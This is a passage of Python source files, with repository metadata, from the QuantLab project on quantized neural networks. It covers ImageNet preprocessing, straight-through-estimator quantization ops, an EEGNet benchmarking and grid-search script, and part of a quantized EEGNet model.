self.inception4a(x)\n # N x 512 x 14 x 14\n x = self.inception4b(x)\n # N x 512 x 14 x 14\n x = self.inception4c(x)\n # N x 512 x 14 x 14\n x = self.inception4d(x)\n # N x 528 x 14 x 14\n x = self.inception4e(x)\n # N x 832 x 14 x 14\n x = self.maxpool4(x)\n # N x 832 x 7 x 7\n x = self.inception5a(x)\n # N x 832 x 7 x 7\n x = self.inception5b(x)\n # N x 1024 x 7 x 7\n x = self.avgpool(x)\n # N x 1024 x 1 x 1\n x = torch.flatten(x, 1)\n # N x 1024\n x = self.dropout(x)\n x = self.fc(x)\n # N x 1000 (num_classes)\n \n if withStats:\n stats = []\n return stats, x\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n\n\nif __name__ == \"__main__\":\n model = GoogLeNet(quantAct=False, weightInqSchedule={}, \n quantSkipFirstLayer=True, quantSkipLastLayer=True, \n pretrained=True)\n \n loadModel = False\n if loadModel:\n # path = '../../../ImageNet/logs/exp038/saves/best-backup.ckpt' # BWN\n# path = '../../../ImageNet/logs/exp043/saves/best.ckpt' # TWN\n path = '../../../ImageNet/logs/exp054/saves/best.ckpt' # BWN\n fullState = torch.load(path, map_location='cpu')\n netState = fullState['indiv']['net']\n model.load_state_dict(netState)\n \n import matplotlib.pyplot as plt\n layerNames = list(netState.keys())\n selectedLayers = ['layer4.0.conv1', \n 'layer2.1.conv2', \n 'layer1.0.conv2']\n # selectedLayers = [l + '.weight' for l in selectedLayers]\n selectedLayers = [l + '.weightFrozen' for l in selectedLayers]\n _, axarr = plt.subplots(len(selectedLayers))\n for ax, layerName in zip(axarr, selectedLayers):\n plt.sca(ax)\n plt.hist(netState[layerName].flatten(), \n bins=201, range=(-3,3))\n plt.xlim(-3,3)\n plt.title(layerName)\n \n exportONNX = False\n if exportONNX:\n modelFullPrec = GoogLeNet(quantAct=False, quantWeights=False, \n weightInqSchedule={}, \n quantSkipFirstLayer=True, \n quantSkipLastLayer=True, \n pretrained=True)\n dummyInput = torch.randn(1, 3, 224, 224)\n pbuf = torch.onnx.export(modelFullPrec, dummyInput, \n \"export.onnx\", verbose=True, \n input_names=['input'], \n output_names=['output'])\n" }, { "alpha_fraction": 0.6254681944847107, "alphanum_fraction": 0.6441947817802429, "avg_line_length": 23.272727966308594, "blob_id": "15311cafea1e1d8d940040a632ecaab0411bfe6b", "content_id": "a214bc96fb33f70680cfe5fbe287979f6852d430", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "permissive", "max_line_length": 55, "num_lines": 11, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/postprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torch\n\ndef postprocess_pr(pr_outs):\n _, pr_outs = torch.max(pr_outs, dim=1)\n return [p.item() for p in pr_outs.detach().cpu()]\n\n\ndef postprocess_gt(gt_labels):\n return [l.item() for l in gt_labels.detach().cpu()]\n" }, { "alpha_fraction": 0.519625186920166, "alphanum_fraction": 0.5514497756958008, "avg_line_length": 33.69938659667969, "blob_id": "119a40030ae5b4e017a6ab88311882b68db32388", "content_id": "72718fec80dd45366e35b4dacbfb51f7ebb028e6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5656, "license_type": "permissive", "max_line_length": 136, "num_lines": 163, "path": "/quantlab/ImageNet/MobileNetv2/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport os\nimport torch\nimport torchvision\nfrom torchvision.transforms import RandomResizedCrop, RandomHorizontalFlip, Resize, RandomCrop, CenterCrop, ToTensor, Normalize, Compose\n\n\n_ImageNet = {\n 'Normalize': {\n 'mean': (0.485, 0.456, 0.406),\n 'std': (0.229, 0.224, 0.225)\n },\n 'PCA': {\n 'eigvals': torch.Tensor([0.2175, 0.0188, 0.0045]),\n 'eigvecs': torch.Tensor([[-0.5675, 0.7192, 0.4009],\n [-0.5808, -0.0045, -0.8140],\n [-0.5836, -0.6948, 0.4203]])\n }\n}\n\n\nclass Grayscale(object):\n\n def __init__(self):\n self._Rec601 = {\n 'red': 0.299,\n 'green': 0.587,\n 'blue': 0.114\n }\n\n def __call__(self, img):\n # uses the Recommendation 601 (Rec. 601) RGB-to-YCbCr conversion\n gs = img.clone()\n gs[0].mul_(self._Rec601['red']).add_(self._Rec601['green'], gs[1]).add_(self._Rec601['blue'], gs[2])\n gs[1].copy_(gs[0])\n gs[2].copy_(gs[0])\n return gs\n\n\nclass Brightness(object):\n\n def __init__(self, alphamax):\n self.alphamax = alphamax\n\n def __call__(self, img):\n # when alpha = 0., the image does not change\n # when alpha = alphamax (<= 1.), the image goes black\n gs = torch.zeros_like(img)\n alpha = self.alphamax * torch.rand(1).item()\n return torch.lerp(img, gs, alpha)\n\n\nclass Contrast(object):\n\n def __init__(self, alphamax):\n self.alphamax = alphamax\n self.grayscale = Grayscale()\n\n def __call__(self, img):\n # when alpha = 0., the image does not change\n # when alpha = alphamax (<= 1.), the image is replaced by the average of pixels of its grayscale version\n gs = self.grayscale(img)\n gs.fill_(gs.mean())\n alpha = self.alphamax * torch.rand(1).item()\n return torch.lerp(img, gs, alpha)\n\n\nclass Saturation(object):\n\n def __init__(self, alphamax):\n self.alphamax = alphamax\n self.grayscale = Grayscale()\n\n def __call__(self, img):\n # when alpha = 0., the image does not change\n # when alpha = alphamax (<= 1.), the image is replaced by its grayscale version\n gs = self.grayscale(img)\n alpha = self.alphamax * torch.rand(1).item()\n return torch.lerp(img, gs, alpha)\n\n\nclass ColorJitter(object):\n\n def __init__(self, brightness_amax=0.4, contrast_amax=0.4, saturation_amax=0.4):\n self.transforms = []\n if brightness_amax != 0.:\n self.transforms.append(Brightness(alphamax=brightness_amax))\n if contrast_amax != 0.:\n self.transforms.append(Contrast(alphamax=contrast_amax))\n if saturation_amax != 0.:\n self.transforms.append(Saturation(alphamax=saturation_amax))\n\n def __call__(self, img):\n if self.transforms is not None:\n order = torch.randperm(len(self.transforms))\n for i in order:\n img = self.transforms[i](img)\n return img\n\n\nclass Lighting(object):\n \"\"\"AlexNet-style, PCA-based lighting noise.\"\"\"\n\n def __init__(self, pcaparams, alphastd=0.1):\n self.eigvals = pcaparams['eigvals']\n self.eigvecs = pcaparams['eigvecs']\n self.alphastd = alphastd\n\n def __call__(self, img):\n # let V be the matrix which columns V^{(j)} are the Principal Components\n # to each RGB pixel is added a random combination \\sum_{j} V^{(j)} (\\alpha_{j} * \\Lambda_{j}),\n # with \\alpha_{j} a normally distributed random scaling factor of the j-th component\n if self.alphastd != 0.:\n alpha = img.new_tensor(0).resize_(3).normal_(0, self.alphastd)\n noise = torch.mul(alpha.view(1, 3), self.eigvals.view(1, 3))\n noise = torch.mul(self.eigvecs.type_as(img).clone(), noise).sum(1)\n img = torch.add(img, noise.view(3, 1, 1).expand_as(img))\n return img\n\n\ndef get_transforms(augment):\n valid_t = Compose([Resize(256),\n CenterCrop(224),\n ToTensor(),\n Normalize(**_ImageNet['Normalize'])])\n if augment == False:\n train_t = valid_t\n elif augment == True:\n train_t = Compose([RandomResizedCrop(224),\n RandomHorizontalFlip(),\n ToTensor(),\n ColorJitter(),\n Lighting(_ImageNet['PCA']),\n Normalize(**_ImageNet['Normalize'])])\n elif augment == \"torchvision\": \n train_t = Compose([RandomResizedCrop(224),\n RandomHorizontalFlip(),\n ToTensor(),\n Normalize(**_ImageNet['Normalize'])])\n elif augment == \"torchvision2\": \n train_t = Compose([Resize(256),\n RandomCrop(224),\n RandomHorizontalFlip(),\n ToTensor(),\n Normalize(**_ImageNet['Normalize'])])\n else:\n assert(False)\n \n transforms = {\n 'training': train_t,\n 'validation': valid_t\n }\n return transforms\n\n\ndef load_data_sets(dir_data, data_config):\n transforms = get_transforms(data_config['augment'])\n train_set = torchvision.datasets.ImageFolder(os.path.join(dir_data, 'train'), transforms['training'])\n valid_set = torchvision.datasets.ImageFolder(os.path.join(os.path.realpath(dir_data), 'val'), transforms['validation'])\n test_set = valid_set\n return train_set, valid_set, test_set\n" }, { "alpha_fraction": 0.855513334274292, "alphanum_fraction": 0.8783270120620728, "avg_line_length": 42.83333206176758, "blob_id": "29f809296efc04ebbed14ea4ebbba94fc56eaaca", "content_id": "519b84b34725046743f65d582c8c7392bfedeb41", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 58, "num_lines": 6, "path": "/quantlab/ImageNet/MobileNetv2/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .mobilenetv2baseline import MobileNetv2Baseline\nfrom .mobilenetv2residuals import MobileNetv2Residuals\nfrom .mobilenetv2quantWeight import MobileNetv2QuantWeight\n" }, { "alpha_fraction": 0.6348921060562134, "alphanum_fraction": 0.6378896832466125, "avg_line_length": 37.79069900512695, "blob_id": "6178231ec171c3d2e91a26c5ba45f0aac92d96a8", "content_id": "26c65275144b48fd7e84f90eb12d27448f5dcbd1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1668, "license_type": "permissive", "max_line_length": 122, "num_lines": 43, "path": "/quantlab/indiv/daemon.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n\nimport torch\nimport torch.nn as nn\n\nfrom .transfer import load_pretrained\n\n\ndef get_topo(logbook):\n \"\"\"Return a network for the experiment and the loss function for training.\"\"\"\n \n # create the network\n net_config = logbook.config['indiv']['net']\n if net_config['class'] not in logbook.module.__dict__:\n raise ValueError('Network topology {} is not defined for problem {}'.format(net_config['class'], logbook.problem))\n net = getattr(logbook.module, net_config['class'])(**net_config['params'])\n \n # load checkpoint state or pretrained network\n if logbook.ckpt:\n net.load_state_dict(logbook.ckpt['indiv']['net'])\n elif net_config['pretrained']:\n load_pretrained(logbook, net)\n \n # move to proper device and, if possible, parallelize\n device = torch.cuda.current_device() if torch.cuda.is_available() else torch.device('cpu')\n net = net.to(device)\n if torch.cuda.device_count() > 1:\n net_maybe_par = nn.DataParallel(net)\n else:\n net_maybe_par = net\n \n # create the loss function\n loss_fn_config = logbook.config['indiv']['loss_function']\n loss_fn_dict = {**nn.__dict__, **logbook.module.__dict__}\n if loss_fn_config['class'] not in loss_fn_dict:\n raise ValueError('Loss function {} is not defined.'.format(loss_fn_config['class']))\n loss_fn = loss_fn_dict[loss_fn_config['class']]\n if 'net' in loss_fn.__init__.__code__.co_varnames:\n loss_fn = loss_fn(net, **loss_fn_config['params'])\n else:\n loss_fn = loss_fn(**loss_fn_config['params'])\n \n return net, net_maybe_par, device, loss_fn\n" }, { "alpha_fraction": 0.5680412650108337, "alphanum_fraction": 0.5816494822502136, "avg_line_length": 34.7185173034668, "blob_id": "48f0201a1bc7f5fdf4bb93ea7dad5c6cac8dc467", "content_id": "00e170d203459ec2981532db5da2e88dd7707503", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4850, "license_type": "permissive", "max_line_length": 116, "num_lines": 135, "path": "/quantlab/indiv/ste_ops.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport torch\nimport quantlab.indiv as indiv\n\nclass ClampWithGradInwards(torch.autograd.Function):\n \"\"\"Clamps the input, passes the grads for inputs inside or at the\n \"\"\"\n @staticmethod\n def forward(ctx, x, low, high):\n ctx.save_for_backward(x, low, high)\n return x.clamp(low.item(), high.item())\n\n @staticmethod\n def backward(ctx, grad_incoming):\n x, low, high = ctx.saved_tensors\n \n grad_outgoing = grad_incoming.clone()\n grad_outgoing[(x > high)] = 0\n grad_outgoing[(x < low)] = 0\n grad_outgoing[(x == high)*(grad_incoming < 0)] = 0\n grad_outgoing[(x == low )*(grad_incoming > 0)] = 0\n return grad_outgoing, None, None\n\n\ndef clampWithGrad(x, low, high):\n return x - (x - x.clamp(low,high)).detach()\n\ndef clampWithGradInwards(x, low, high):\n return ClampWithGradInwards().apply(x, x.new([low]), x.new([high]))\n\ndef STERoundFunctional(x):\n return x - (x - x.round()).detach()\n\ndef STEFloorFunctional(x):\n neg = (x < 0).to(dtype=torch.float)\n floored = x.floor() + neg\n return x - (x - floored).detach()\n\nclass STEController(indiv.Controller):\n def __init__(self, modules, clearOptimStateOnStart=False):\n super().__init__()\n self.modules = modules\n self.clearOptimStateOnStart = clearOptimStateOnStart\n \n def step(self, epoch, optimizer=None, tensorboardWriter=None):\n #step each STE module\n for m in self.modules: \n m.step(epoch, self.clearOptimStateOnStart, optimizer)\n \n @staticmethod\n def getSteModules(net):\n return [m for m in net.modules() if isinstance(m, STEActivation)]\n\nclass STEActivation(torch.nn.Module):\n \"\"\"quantizes activations according to the straight-through estiamtor (STE). \n Needs a STEController, if startEpoch > 0\n\n monitorEpoch: In this epoch, keep track of the maximal activation value (absolute value).\n Then (at epoch >= startEpoch), clamp the values to [-max, max], and then do quantization.\n If monitorEpoch is None, max=1 is used.\"\"\"\n def __init__(self, startEpoch=0, numLevels=3, passGradsWhenClamped=False, monitorEpoch=None, floorToZero=False):\n super().__init__()\n self.startEpoch = startEpoch\n self.started = startEpoch <= 0\n\n self.monitorEpoch = monitorEpoch\n self.monitoring = False\n if monitorEpoch is not None:\n self.monitoring = monitorEpoch == 1 # because the epoch starts at epoch 1\n assert(startEpoch > monitorEpoch)\n\n self.floorToZero = floorToZero\n\n assert(numLevels >= 2)\n self.numLevels = numLevels\n self.passGradsWhenClamped = passGradsWhenClamped\n self.absMaxValue = torch.nn.Parameter(torch.ones(1),\n requires_grad=False)\n\n def forward(self, x):\n if self.monitoring:\n self.absMaxValue.data[0] = max(x.abs().max(), self.absMaxValue.item())\n \n if self.started:\n# factor = 1/self.absMaxValue.item() * (self.numLevels // 2)\n# xclamp = clampWithGrad(x, -1, 1)\n x = x / self.absMaxValue.item() # map from [-max, max] to [-1, 1]\n if self.passGradsWhenClamped:\n# xclamp = clampWithGrad(x, -1, 1)\n xclamp = clampWithGradInwards(x, -1, 1)\n else:\n xclamp = x.clamp(-1, 1)\n \n y = xclamp\n if self.floorToZero:\n y = STEFloorFunctional(y*((self.numLevels - 1)/2))/((self.numLevels - 1)/2)\n else:\n y = (y + 1)/2 # map from [-1,1] to [0,1]\n y = STERoundFunctional(y*(self.numLevels - 1))/(self.numLevels - 1)\n y = 2*y - 1\n y = y * self.absMaxValue.item() # map from [-1, 1] to [-max, max]\n# factorLevels = (self.numLevels // 2)\n# y = STERoundFunctional(xclamp*factorLevels)/factorLevels\n else:\n y = x\n return y\n \n def step(self, epoch, clearOptimStateOnStart, optimizer):\n if clearOptimStateOnStart and epoch == self.startEpoch:\n optimizer.state.clear()\n\n if epoch >= self.startEpoch:\n self.started = True\n\n if self.monitorEpoch is not None and epoch == self.monitorEpoch:\n self.monitoring = True\n self.absMaxValue.data[0] = 0.0\n else:\n self.monitoring = False\n \n\n\nif __name__ == \"__main__\":\n #TESTING\n u = torch.randn(10, requires_grad=True)\n x = u*2\n \n y = STEActivation(numLevels=2)(x)\n# y = STERoundFunctional(x)\n# y = clampWithGradInwards(x, -1, 1)\n \n# L = (y-torch.ones_like(y)*10).norm(2) # pull to 10\n L = y.norm(2) # pull to 0\n L.backward()\n \n \n \n \n \n\n\n\n" }, { "alpha_fraction": 0.5587016344070435, "alphanum_fraction": 0.5756215453147888, "avg_line_length": 31.81586456298828, "blob_id": "845d0f5362df4946bb1338691d271c6ce55d0972", "content_id": "a0c3c21873803b06b1f3e455a227d94eec7fee36", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11584, "license_type": "permissive", "max_line_length": 106, "num_lines": 353, "path": "/eegnet_run.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "import os\nimport shutil\nimport json\nimport sys\nimport numpy as np\nfrom contextlib import redirect_stdout, redirect_stderr\nimport progress\nfrom tqdm import tqdm\nimport pickle\n\nfrom tensorboard.backend.event_processing.event_accumulator import EventAccumulator\n\nfrom main import main as quantlab_main\n\nPROBLEM = \"BCI-CompIV-2a\"\nTOPOLOGY = \"EEGNet\"\nEXP_FOLDER = \"logs/exp{}\"\nMEAS_ID = 12\nINQ_CONFIG = f\"measurement/M{MEAS_ID:02}.json\"\nBAK_CONFIG = \".config_backup.json\"\nMAIN_CONFIG = \"config.json\"\nEXP_BASE = MEAS_ID * 100\nEXPORT_FILE = f\"logs/measurement_{MEAS_ID:02}\" + \"_{}.npz\"\nEXPORT_GRID_FILE = 'logs/grid_{}.npz'\n\nBENCHMARK = True\nGRID_MEASUREMENT = False\nN_ITER = 15\n\n\ndef single_iter(bar=None, silent=False, n_weights=None, n_activ=None):\n iter_stats = np.zeros((9, 4))\n with TestEnvironment():\n for i in range(9):\n subject = i + 1\n stats = _do_subject(subject, bar, silent, n_weights=n_weights, n_activ=n_activ)\n if not silent:\n print(f\"Subject {subject}: quantized accuracy: {stats['valid_acc']:.4f} \")\n iter_stats[i] = np.array([stats['train_loss'],\n stats['train_acc'],\n stats['valid_loss'],\n stats['valid_acc']])\n\n if not silent:\n print(f\"Average quantized accuracy = {iter_stats.mean(axis=0)[3]}\")\n\n return iter_stats\n\n\ndef grid_measurement():\n stats = {}\n cases = [\n (255, 255),\n (255, 127),\n (255, 63),\n (255, 31),\n (255, 15),\n (127, 255),\n (127, 127),\n (127, 63),\n (127, 31),\n (127, 15),\n (63, 255),\n (63, 127),\n (63, 63),\n (63, 31),\n (63, 15),\n (31, 255),\n (31, 127),\n (31, 63),\n (31, 31),\n (31, 15),\n (15, 255),\n (15, 127),\n (15, 63),\n (15, 31),\n (15, 15),\n ]\n with tqdm(desc=f'Grid Searching on measurement {MEAS_ID:02}', total=N_ITER * 9 * len(cases),\n ascii=True) as bar:\n for n_weights, n_activ in cases:\n stats[(n_weights, n_activ)] = np.zeros((N_ITER, 9, 4))\n for i in range(N_ITER):\n iter_stats = single_iter(bar=bar, silent=True, n_weights=n_weights, n_activ=n_activ)\n stats[(n_weights, n_activ)][i, :, :] = iter_stats\n legend = [\"train_loss\", \"train_acc\", \"valid_loss\", \"valid_acc\"]\n\n # store it\n filename = os.path.join(PROBLEM, 'grid_results.pkl')\n with open(filename, 'wb') as _f:\n pickle.dump({\"stats\": stats, \"legend\": legend}, _f)\n\n\ndef benchmark():\n stats = np.zeros((N_ITER, 9, 4))\n\n with tqdm(desc=f'Benchmarking Measurement {MEAS_ID:02}', total=N_ITER * 9, ascii=True) as bar:\n for i in range(N_ITER):\n iter_stats = single_iter(bar=bar, silent=True)\n stats[i, :, :] = iter_stats\n\n # store the data to make sure not to loose it\n np.savez(file=os.path.join(PROBLEM, EXPORT_FILE.format(\"runs\")),\n train_loss=stats[i, :, 0],\n train_acc=stats[i, :, 1],\n valid_loss=stats[i, :, 2],\n valid_acc=stats[i, :, 3])\n\n # compute statistics\n avg_stats = stats.mean(axis=0)\n std_stats = stats.std(axis=0)\n\n # For the overall score, first average along all subjects.\n # For standard deviation, average all standard deviations of all subjects\n mean_avg_stats = avg_stats[:].mean(axis=0) # average over all subjects\n mean_std_stats = std_stats[:].mean(axis=0) # std over all subjects\n\n print(f\"Total Average Accuracy: {mean_avg_stats[3]:.4f} +- {mean_std_stats[3]:.4f}\\n\")\n for i in range(0, 9):\n print(f\"subject {i+1}: quantized model = {avg_stats[i,3]:.4f} +- {std_stats[i,3]:.4f}\")\n\n\ndef _do_subject(subject, bar=None, silent=False, n_weights=None, n_activ=None):\n exp_id = EXP_BASE + subject\n\n if not silent:\n print(f\"Subject {subject}: training quantized model (exp{exp_id})...\\r\", end='',\n flush=True)\n\n modification = {'treat.data.subject': subject}\n if n_weights is not None:\n modification['indiv.net.params.weightInqNumLevels'] = n_weights\n modification[\"indiv.net.params.first_layer_only\"] = True\n if n_activ is not None:\n modification['indiv.net.params.actSTENumLevels'] = n_activ\n valid_stats, train_stats = _execute_quantlab(INQ_CONFIG, exp_id, modification)\n\n if bar is not None:\n bar.update()\n\n # accumulate log files\n if BENCHMARK or GRID_MEASUREMENT:\n # _accumulate_logs(subject, exp_id)\n _just_store_anything(subject, exp_id, n_weights=n_weights, n_activ=n_activ)\n\n return _format_all_stats(train_stats, valid_stats)\n\n\ndef _execute_quantlab(config_file, exp_id, modify_keys=None):\n # remove all the logs of the previous quantized training experiment\n log_folder = os.path.join(PROBLEM, EXP_FOLDER.format(exp_id))\n if os.path.exists(log_folder):\n shutil.rmtree(log_folder)\n\n # load configuration\n config = {}\n with open(os.path.join(PROBLEM, config_file)) as _fp:\n config = json.load(_fp)\n\n # modify keys\n for path, value in modify_keys.items():\n _set_dict_value(config, path, value)\n\n # store the configuration back as config.json\n if os.path.exists(os.path.join(PROBLEM, MAIN_CONFIG)):\n os.remove(os.path.join(PROBLEM, MAIN_CONFIG))\n with open(os.path.join(PROBLEM, MAIN_CONFIG), \"w\") as _fp:\n json.dump(config, _fp)\n\n # execute quantlab without output\n with open(os.devnull, 'w') as devnull, redirect_stderr(devnull), redirect_stdout(devnull):\n train_stats, stats = quantlab_main(PROBLEM, TOPOLOGY, exp_id, 'best', 'train', 10, 1, False,\n True)\n\n return stats, train_stats\n\n\ndef _format_all_stats(train_stats, valid_stats):\n stats = {}\n for key, value in train_stats.items():\n if key.endswith(\"loss\"):\n stats['train_loss'] = value\n if key.endswith(\"metric\"):\n stats['train_acc'] = value\n for key, value in valid_stats.items():\n if key.endswith(\"loss\"):\n stats['valid_loss'] = value\n if key.endswith(\"metric\"):\n stats['valid_acc'] = value\n\n return stats\n\n\ndef _format_stats(ref_stats, quant_stats=None):\n stats = {}\n\n if quant_stats is None:\n for key, value in ref_stats.items():\n if key.endswith(\"loss\"):\n stats['loss'] = value\n if key.endswith(\"metric\"):\n stats['acc'] = value\n\n else:\n for key, value in ref_stats.items():\n if key.endswith(\"loss\"):\n stats['float_loss'] = value\n if key.endswith(\"metric\"):\n stats['float_acc'] = value\n for key, value in quant_stats.items():\n if key.endswith(\"loss\"):\n stats['quant_loss'] = value\n if key.endswith(\"metric\"):\n stats['quant_acc'] = value\n\n return stats\n\n\ndef _set_dict_value(d, path, value):\n keys = path.split('.')\n d_working = d\n for key in keys[:-1]:\n d_working = d_working[key]\n d_working[keys[-1]] = value\n\n\ndef _just_store_anything(subject, exp_id, n_weights=None, n_activ=None):\n \"\"\" stores everything \"\"\"\n # extract name of logfile\n stats_folder = os.path.join(PROBLEM, EXP_FOLDER.format(exp_id), \"stats\")\n log_files = os.listdir(stats_folder)\n assert(len(log_files) == 1)\n log_file = os.path.join(stats_folder, log_files[0])\n\n # get eventaccumulator\n ea = EventAccumulator(log_file)\n ea.Reload()\n\n # load data file\n if GRID_MEASUREMENT:\n name_addon = f\"data_W{n_weights}_A{n_activ}_S{subject:02}\"\n else:\n name_addon = f\"data_S{subject:02}\"\n data_file = os.path.join(PROBLEM, EXPORT_FILE.format(name_addon))\n if os.path.exists(data_file):\n with np.load(data_file) as data_loader:\n data = dict(data_loader)\n else:\n data = {'num_trials': 0}\n\n # update the data dictionary to keep the mean value\n num_trials = data['num_trials']\n for key in ea.Tags()['scalars']:\n new_arr = _prepare_scalar_array_from_tensorboard(ea, key)\n new_arr = np.array([new_arr])\n if num_trials == 0:\n # just add the data\n data[key] = new_arr\n else:\n assert(key in data)\n data[key] = np.concatenate((data[key], new_arr), axis=0)\n data['num_trials'] += 1\n\n # store data back into the same file\n np.savez(data_file, **data)\n\n\ndef _accumulate_logs(subject, exp_id):\n # extract name of logfile\n stats_folder = os.path.join(PROBLEM, EXP_FOLDER.format(exp_id), \"stats\")\n log_files = os.listdir(stats_folder)\n assert(len(log_files) == 1)\n log_file = os.path.join(stats_folder, log_files[0])\n\n # get eventaccumulator\n ea = EventAccumulator(log_file)\n ea.Reload()\n\n # load data file\n name_addon = f\"data_S{subject:02}\"\n data_file = os.path.join(PROBLEM, EXPORT_FILE.format(name_addon))\n if os.path.exists(data_file):\n with np.load(data_file) as data_loader:\n data = dict(data_loader)\n else:\n data = {'num_trials': 0}\n\n # update the data dictionary to keep the mean value\n num_trials = data['num_trials']\n for key in ea.Tags()['scalars']:\n new_arr = _prepare_scalar_array_from_tensorboard(ea, key)\n if num_trials == 0:\n # just add the data\n data[key] = new_arr\n else:\n assert(key in data)\n data[key] = (data[key] * num_trials + new_arr) / (num_trials + 1)\n data['num_trials'] += 1\n\n # store data back into the same file\n np.savez(data_file, **data)\n\n\ndef _prepare_scalar_array_from_tensorboard(ea, key, start_step=1):\n if ea.Scalars(key)[-1].step == len(ea.Scalars(key)):\n return np.array([x.value for x in ea.Scalars(key)])\n else:\n arr = np.zeros(ea.most_recent_step)\n entries = ea.Scalars(key)\n # we assume the value is zero at the beginning\n for i_entry in range(len(entries)):\n start_idx = entries[i_entry].step - start_step\n end_idx = entries[i_entry + 1].step if i_entry + 1 < len(entries) else \\\n ea.most_recent_step - start_step + 1\n arr[start_idx:end_idx] = entries[i_entry].value\n return arr\n\n\nclass TestEnvironment():\n def __enter__(self):\n # backup config.json if it exists\n if os.path.exists(os.path.join(PROBLEM, MAIN_CONFIG)):\n os.rename(os.path.join(PROBLEM, MAIN_CONFIG),\n os.path.join(PROBLEM, BAK_CONFIG))\n\n # hide progress default output\n self.devnull = open(os.devnull, 'w')\n progress.Infinite.file = self.devnull\n\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # remove the created config.json file\n if os.path.exists(os.path.join(PROBLEM, MAIN_CONFIG)):\n os.remove(os.path.join(PROBLEM, MAIN_CONFIG))\n\n # move backup back\n if os.path.exists(os.path.join(PROBLEM, BAK_CONFIG)):\n os.rename(os.path.join(PROBLEM, BAK_CONFIG),\n os.path.join(PROBLEM, MAIN_CONFIG))\n\n # reenable default progress\n progress.Infinite.file = sys.stderr\n\n\nif __name__ == '__main__':\n\n if GRID_MEASUREMENT:\n grid_measurement()\n if BENCHMARK:\n benchmark()\n else:\n single_iter()\n" }, { "alpha_fraction": 0.533423662185669, "alphanum_fraction": 0.5587172508239746, "avg_line_length": 39.0723991394043, "blob_id": "7a8c9ef9b4f8de5350c8823a2d4a9d7faa033901", "content_id": "32b1af545341845a777fd3325602ab54f88e57fb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8856, "license_type": "permissive", "max_line_length": 102, "num_lines": 221, "path": "/quantlab/BCI-CompIV-2a/EEGNet/eegnet.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 Tibor Schneider\n\nimport numpy as np\nimport torch as t\nimport torch.nn.functional as F\n\nfrom quantlab.indiv.inq_ops import INQController, INQLinear, INQConv2d\nfrom quantlab.indiv.ste_ops import STEActivation, STEController\n\n\nclass EEGNet(t.nn.Module):\n \"\"\"\n Quantized EEGNet\n \"\"\"\n\n def __init__(self, F1=8, D=2, F2=None, C=22, T=1125, N=4, p_dropout=0.5,\n dropout_type='TimeDropout2d', quantWeight=True, quantAct=True,\n weightInqSchedule=None, weightInqNumLevels=255, weightInqStrategy=\"matnitude\",\n weightInqInitMethod=\"uniform\", actSTENumLevels=255, actSTEStartEpoch=2,\n floorToZero=False, actFirstLayerNumLevels=None, weightFirstLayerNumLevels=None,\n first_layer_only=False):\n \"\"\"\n F1: Number of spectral filters\n D: Number of spacial filters (per spectral filter), F2 = F1 * D\n F2: Number or None. If None, then F2 = F1 * D\n C: Number of EEG channels\n T: Number of time samples\n N: Number of classes\n p_dropout: Dropout Probability\n dropout_type: string, either 'dropout', 'SpatialDropout2d' or 'TimeDropout2D'\n floorToZero: STE rounding is done by floor towards zero\n \"\"\"\n super(EEGNet, self).__init__()\n\n if weightInqSchedule is None:\n raise TypeError(\"Parameter weightInqSchedule is not set\")\n if weightFirstLayerNumLevels is None:\n weightFirstLayerNumLevels = weightInqNumLevels\n if actFirstLayerNumLevels is None:\n actFirstLayerNumLevels = actSTENumLevels\n\n weightInqSchedule = {int(k): v for k, v in weightInqSchedule.items()}\n\n # prepare network constants\n if F2 is None:\n F2 = F1 * D\n\n # Prepare Dropout Type\n if dropout_type.lower() == 'dropout':\n dropout = t.nn.Dropout\n elif dropout_type.lower() == 'spatialdropout2d':\n dropout = t.nn.Dropout2d\n elif dropout_type.lower() == 'timedropout2d':\n dropout = TimeDropout2d\n else:\n raise ValueError(\"dropout_type must be one of SpatialDropout2d, Dropout or \"\n \"WrongDropout2d\")\n\n # store local values\n self.F1, self.D, self.F2, self.C, self.T, self.N = (F1, D, F2, C, T, N)\n self.p_dropout = p_dropout\n\n # Number of input neurons to the final fully connected layer\n n_features = (T // 8) // 8\n\n # prepare helper functions to easily declare activation, convolution and linear unit\n def activ():\n return t.nn.ReLU(inplace=True)\n\n def quantize(numLevels=None, first=False):\n start = actSTEStartEpoch\n monitor = start - 1\n if numLevels is None or (not first and first_layer_only):\n numLevels = actSTENumLevels\n if quantAct:\n return STEActivation(startEpoch=start, monitorEpoch=monitor,\n numLevels=numLevels, floorToZero=floorToZero)\n else:\n return t.nn.Identity()\n\n def linear(name, n_in, n_out, bias=True, first=False):\n if quantWeight and not (not first and first_layer_only):\n return INQLinear(n_in, n_out, bias=bias, numLevels=weightInqNumLevels,\n 